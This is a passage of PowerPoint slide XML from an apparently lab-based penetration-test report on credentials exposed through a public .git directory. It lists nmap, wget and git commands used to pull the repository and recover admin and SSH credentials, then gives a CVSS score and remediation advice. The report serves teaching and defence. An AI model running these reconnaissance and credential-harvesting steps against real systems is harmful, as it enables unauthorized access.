            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" b="1" dirty="0"/>
              <a:t>Proof of Concept (PoC):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Discovered accessible </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" i="1" dirty="0"/>
              <a:t>.git </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>directory via scan</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Downloaded repository contents using tools like </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" i="1" dirty="0" err="1"/>
              <a:t>wget</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" i="1" dirty="0"/>
              <a:t> -r</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Examined commit history: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" i="1" dirty="0"/>
              <a:t>git log</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Found credentials in historical commit: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" i="1" dirty="0"/>
              <a:t>git show a4d900a</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Extracted hardcoded credentials: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0"/>
              <a:t>Email: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" i="1" dirty="0"/>
              <a:t>lanf@admin.com   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0"/>
              <a:t>Password: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" i="1" dirty="0"/>
              <a:t>321</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="387191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E93C-7982-B8DD-3AC8-F9C58C06D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29417-859E-3A46-C2C8-3D17D431A465}"/>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3985047F-F83C-9D46-478A-AD85DCB32B38}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="258418" y="805071"/>
            <a:ext cx="7225748" cy="5506277"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" dirty="0"/>
              <a:t>Process Analysis:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Initial reconnaissance with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" i="1" dirty="0" err="1"/>
              <a:t>netdiscover</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t> identified active hosts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" i="1" dirty="0" err="1"/>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t> scan revealed open ports </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" i="1" dirty="0"/>
              <a:t>(22/SSH, 80/HTTP)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Web browsing discovered accessible</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" i="1" dirty="0"/>
              <a:t> .git </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>directory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Repository reconstruction revealed historical commits</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Credentials from old commit allowed authentication bypass</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Further exploitation led to SQL injection and RCE vulnerabilities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" dirty="0"/>
              <a:t>Steps to Reproduce:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0"/>
              <a:t>Scan target network to identify web server: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" i="1" dirty="0" err="1"/>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" i="1" dirty="0"/>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" i="1" dirty="0" err="1"/>
              <a:t>sS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" i="1" dirty="0"/>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" i="1" dirty="0" err="1"/>
              <a:t>sV</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" i="1" dirty="0"/>
              <a:t> --version-all -O --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" i="1" dirty="0" err="1"/>
              <a:t>osscan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" i="1" dirty="0"/>
              <a:t>-guess -A -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" i="1" dirty="0" err="1"/>
              <a:t>sC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" i="1" dirty="0"/>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" i="1" dirty="0" err="1"/>
              <a:t>Pn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" i="1" dirty="0"/>
              <a:t> --script vuln -T5 -p 21,22,80 192.168.139.143 -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" i="1" dirty="0" err="1"/>
              <a:t>oA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" i="1" dirty="0"/>
              <a:t> /root/Desktop</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" b="1" dirty="0"/>
              <a:t>Search URL : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId2">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>http://192.168.139.143/.git/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Check for exposed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" i="1" dirty="0"/>
              <a:t> .git </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>directory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" sz="1800" b="1" dirty="0"/>
              <a:t>Impact</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1800" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" i="1" dirty="0"/>
              <a:t>The exposure of the .git repository can directly lead to</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Authentication bypass using discovered credentials</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Remote code execution through chained vulnerabilities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Privilege escalation to root access</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Complete system compromise with access to sensitive data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1" dirty="0"/>
              <a:t>(root.txt)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6AE6F1F5-8EF1-E15E-50CB-21905E5EAD08}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7269679" y="975361"/>
            <a:ext cx="4668291" cy="594412"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst>
            <a:glow rad="228600">
              <a:schemeClr val="accent3">
                <a:satMod val="175000"/>
                <a:alpha val="40000"/>
              </a:schemeClr>
            </a:glow>
          </a:effectLst>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A662E9B0-69B6-CCD0-7C62-FE4CA85F8AE6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8609737" y="1947386"/>
            <a:ext cx="1988177" cy="556278"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst>
            <a:glow rad="228600">
              <a:schemeClr val="accent3">
                <a:satMod val="175000"/>
                <a:alpha val="40000"/>
              </a:schemeClr>
            </a:glow>
          </a:effectLst>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F8F8F37C-4680-0BE6-83D2-0EC4DB150D74}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8113987" y="2905031"/>
            <a:ext cx="2979678" cy="594412"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst>
            <a:glow rad="228600">
              <a:schemeClr val="accent3">
                <a:satMod val="175000"/>
                <a:alpha val="40000"/>
              </a:schemeClr>
            </a:glow>
          </a:effectLst>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4862297A-B904-E5F0-5AEF-97751F7B43B2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8113987" y="3900810"/>
            <a:ext cx="2979678" cy="2085530"/>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108135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55D07-EB1D-310F-DB70-06C80FA80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B39D4-524B-01C9-50B4-3E3783609D69}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1066800" y="256033"/>
            <a:ext cx="10058400" cy="549038"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="3600" dirty="0"/>
              <a:t>Credential Disclosure via Git Logs Vulnerability</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BA2E19A2-FE69-0FAC-7E11-4C6D7E602F12}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="258417" y="805071"/>
            <a:ext cx="11628783" cy="5367129"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" dirty="0"/>
              <a:t>Vulnerability Name: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Hardcoded Credentials Exposure in Git Repository</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" dirty="0"/>
              <a:t>Vulnerability Description: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>The target system's</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" i="1" dirty="0"/>
              <a:t> .git </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>directory was publicly accessible, exposing version control history, including a commit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" i="1" dirty="0"/>
              <a:t>(a4d900a) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>that contained hardcoded credentials </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" i="1" dirty="0"/>
              <a:t>(lanf@admin.com:321) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>in the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>login.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> file. This allowed to bypass authentication and gain unauthorized access to the web application.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" dirty="0"/>
              <a:t>Affected Machine, URL &amp; Parameter: Machine IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0"/>
              <a:t>: 192.168.139.143 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" dirty="0"/>
              <a:t>URL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId2">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>http://192.168.139.143/.git/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t>Vulnerable File</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" i="1" dirty="0" err="1"/>
              <a:t>login.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>(exposed via git show a4d900a)</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" dirty="0"/>
              <a:t>Severity: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" i="1" dirty="0"/>
              <a:t>High</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>due to its significant impact on the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t>confidentiality, integrity, and availability</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> of the target system. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" dirty="0"/>
              <a:t>Risk/Impact: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" b="1" dirty="0"/>
              <a:t>Authentication Bypass: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0"/>
              <a:t>We used the exposed credentials </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" i="1" dirty="0"/>
              <a:t>(lanf@admin.com:321) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0"/>
              <a:t>to log in as administrators.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" b="1" dirty="0"/>
              <a:t>Privilege Escalation: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0"/>
              <a:t>The compromised account facilitated further exploitation (e.g., SQL injection, RCE).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" b="1" dirty="0"/>
              <a:t>System Compromise: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0"/>
              <a:t>Credentials led to SSH access </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" i="1" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" i="1" dirty="0" err="1"/>
              <a:t>jehad:fool</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" i="1" dirty="0"/>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0"/>
              <a:t>and eventual root access.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" dirty="0"/>
              <a:t>Recommendations:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="1700" b="1" dirty="0"/>
              <a:t>Restrict .git Access: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1700" dirty="0"/>
              <a:t>Block directory listing via web server rules</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="1700" b="1" dirty="0"/>
              <a:t>Purge Sensitive Commits: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1700" dirty="0"/>
              <a:t>Use git filter-repo to remove credentials from version history.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="1700" b="1" dirty="0"/>
              <a:t>Implement Secrets Management: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1700" dirty="0"/>
              <a:t>Store credentials in environment variables or secure vaults (e.g., </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1700" dirty="0" err="1"/>
              <a:t>HashiCorp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1700" dirty="0"/>
              <a:t> Vault).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="1700" b="1" dirty="0"/>
              <a:t>Audit Deployments: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1700" dirty="0"/>
              <a:t>Ensure .git directories are excluded from production environments.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="890059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ED2F1-4D26-281F-BB06-586AC6288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9F687-0719-8395-F4C4-708AF833F71E}"/>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7992C603-45D3-3D73-471F-F7835F69F24E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="258417" y="805071"/>
            <a:ext cx="11628783" cy="5367129"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" dirty="0"/>
              <a:t>CVSS Score: 8.1 (High)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" dirty="0"/>
              <a:t>CVSS String: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1800" b="1" dirty="0"/>
              <a:t>CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="1800" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" dirty="0"/>
              <a:t>Reference: </a:t>
            </a:r>
            <a:r>
